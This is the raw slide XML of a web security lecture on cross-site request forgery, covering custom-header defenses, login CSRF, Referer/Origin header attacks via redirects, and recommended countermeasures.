          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s481401" name="Acrobat Document" r:id="rId3" imgW="7284240" imgH="3691080" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="7284240" imgH="369108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 y="1717675"/>
                        <a:ext cx="7526338"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Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1989137" y="4029075"/>
            <a:ext cx="533400" cy="1112837"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="869406"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91436" tIns="45716" rIns="91436" bIns="45716" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" baseline="-25000">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65"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ko-KR" smtClean="0">
                <a:ea typeface="굴림" pitchFamily="-65" charset="-127"/>
              </a:rPr>
              <a:t>Custom Header Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>XMLHttpRequest is for same-origin requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Can use setRequestHeader within origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Limitations on data export format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>No setRequestHeader equivalent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>XHR2 has a whitelist for cross-site requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Issue POST requests via AJAX:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Doesn't work across domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="5486400"/>
            <a:ext cx="4572000" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2216" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94213" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3051"/>
              <a:ext cx="2208"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94214" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3052"/>
              <a:ext cx="2216" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>X-Requested-By: XMLHttpRequest</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Broader view of CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Abuse of cross-site data export feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>From user’s browser to honest server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disrupts integrity of user’s session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why mount a CSRF attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not just “session riding”</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smtClean="0"/>
              <a:t>Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7170" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1471613"/>
          <a:ext cx="7924800" cy="5119687"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s482425" name="Acrobat Document" r:id="rId3" imgW="6998400" imgH="4521600" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="6998400" imgH="45216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71613"/>
                        <a:ext cx="7924800"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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="5334000"/>
            <a:ext cx="26670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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4381500" y="4152900"/>
            <a:ext cx="20574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a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Three vulnerabilities we will discuss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>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
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4648200"/>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Inject malicious script into trusted context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="33305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Leverage user’s session at </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim sever</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="20351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Uses SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change meaning of database command</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Payments Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97283" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1062038" y="1209675"/>
            <a:ext cx="7019925" cy="481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Payments Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98307" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1071563" y="1209675"/>
            <a:ext cx="7000875" cy="481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Payments Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99331" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1062038" y="1209675"/>
            <a:ext cx="7019925" cy="4810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Payments Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100355" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="1295400"/>
            <a:ext cx="4760913" cy="5095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smtClean="0"/>
              <a:t>Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8194" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1600200"/>
          <a:ext cx="7924800" cy="5119688"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s483449" name="Acrobat Document" r:id="rId4" imgW="6998400" imgH="4521600" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId4" imgW="6998400" imgH="45216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9248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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="3962400"/>
            <a:ext cx="26670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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4838700" y="2781300"/>
            <a:ext cx="20574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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sites can redirect browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110595" name="Picture 2" descr="Redirecting Incoming Http Requests"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="14000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="1828800"/>
            <a:ext cx="6724650" cy="3276600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110596" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3638550" y="1676400"/>
            <a:ext cx="2514600" cy="4572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0597" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3429000"/>
            <a:ext cx="6096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0598" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="742950" y="3886200"/>
            <a:ext cx="19812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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Attack on origin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112643" name="Picture 2" descr="Redirecting Incoming Http Requests"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="14000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="1828800"/>
            <a:ext cx="6724650" cy="3276600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112644" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3638550" y="1676400"/>
            <a:ext cx="2514600" cy="4572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5" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3429000"/>
            <a:ext cx="6096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6" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="742950" y="3886200"/>
            <a:ext cx="19812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7" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="1828800"/>
            <a:ext cx="2789238" cy="338138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>referer: http://www.site.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112648" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="3471863"/>
            <a:ext cx="2789238" cy="338137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>referer: http://www.site.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5334000"/>
            <a:ext cx="8077200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="6F89F7"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>What if honest site sends POST to attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="6F89F7"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>origin header records redirect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CSRF Recommendations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="7391400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Login CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Strict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/Origin header validation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Login forms typically submit over HTTPS, not blocked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTTPS sites, such as banking sites </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use strict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/Origin validation to prevent CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use Ruby-on-Rails or other framework that implements secret token method correctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Origin header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Alternative to </a:t>
            </a:r>
